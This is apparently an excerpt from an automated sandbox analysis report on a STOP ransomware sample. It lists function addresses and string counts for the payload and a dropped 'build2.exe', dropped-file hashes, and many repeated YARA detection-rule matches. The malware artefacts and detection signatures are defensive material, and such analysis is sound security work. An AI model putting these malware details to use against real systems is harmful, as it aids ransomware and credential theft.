                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B30F04_2_005B30F0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005E04614_2_005E0461
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005E0C1B4_2_005E0C1B
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005DFC2E4_2_005DFC2E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005B3D404_2_005B3D40
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_004033A05_2_004033A0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0043027B5_2_0043027B
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042F28E5_2_0042F28E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_004027505_2_00402750
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042F7235_2_0042F723
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042FAC15_2_0042FAC1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0042FE935_2_0042FE93
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E88FCA5_2_61E88FCA
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EAD2AC5_2_61EAD2AC
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E4B8A15_2_61E4B8A1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E75F1F5_2_61E75F1F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E400655_2_61E40065
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9E24F5_2_61E9E24F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E625545_2_61E62554
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9A4A75_2_61E9A4A7
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E4E4BF5_2_61E4E4BF
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E947835_2_61E94783
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E7A7905_2_61E7A790
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E187365_2_61E18736
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E866685_2_61E86668
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E586705_2_61E58670
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E6667F5_2_61E6667F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EA0BA95_2_61EA0BA9
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E62CA35_2_61E62CA3
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E98FE25_2_61E98FE2
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E52F805_2_61E52F80
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EA2F475_2_61EA2F47
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E56F185_2_61E56F18
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E4CEF95_2_61E4CEF9
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E1EEFF5_2_61E1EEFF
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EA91F65_2_61EA91F6
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E651DD5_2_61E651DD
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9316A5_2_61E9316A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9F0ED5_2_61E9F0ED
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EA70CF5_2_61EA70CF
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9D0C35_2_61E9D0C3
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E8D0B65_2_61E8D0B6
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E6904E5_2_61E6904E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E4304E5_2_61E4304E
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E153375_2_61E15337
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E672DC5_2_61E672DC
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E192085_2_61E19208
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E534E35_2_61E534E3
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E774525_2_61E77452
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E379305_2_61E37930
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E218165_2_61E21816
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E9FBF05_2_61E9FBF0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E55BD75_2_61E55BD7
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EA5B625_2_61EA5B62
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E91DC15_2_61E91DC1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E6DDA55_2_61E6DDA5
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E31DAB5_2_61E31DAB
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E95D7A5_2_61E95D7A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E5BC4C5_2_61E5BC4C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E25FA25_2_61E25FA2
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E1DEC25_2_61E1DEC2
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E69E8F5_2_61E69E8F
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E89E0E5_2_61E89E0E
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe 26063C78E5418610471A9F3A00A155D7D1E5B29856E1979BA3BDC42681A871D0
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe 26063C78E5418610471A9F3A00A155D7D1E5B29856E1979BA3BDC42681A871D0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: String function: 00406B5F appears 37 times
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: String function: 00403FAC appears 44 times
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00308C81 appears 38 times
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00334E50 appears 36 times
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 003347A0 appears 33 times
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 0030F7C0 appears 74 times
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 0032F23E appears 55 times
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00308520 appears 69 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BBF7C0 appears 129 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BB8C81 appears 74 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BE0870 appears 52 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BE4E50 appears 62 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BDF26C appears 41 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BD1A25 appears 44 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BE47A0 appears 64 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BB2587 appears 48 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BDF23E appears 108 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BB8520 appears 136 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BB5007 appears 32 times
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: String function: 00BB0EC2 appears 40 times
                Source: sqlite3[1].dll.5.drStatic PE information: Number of sections : 18 > 10
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeSection loaded: nss3.dll
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: SAMPLEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: SAMPLEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 3.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 3.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 6.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 6.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 6.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 6.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 2.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 2.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 0.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 3.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 3.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.b90000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000002.00000000.1666073748.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000000.1645947470.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000000A.00000002.1921214760.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000000A.00000002.1921120348.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000006.00000000.1797777128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000006.00000002.1841882825.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
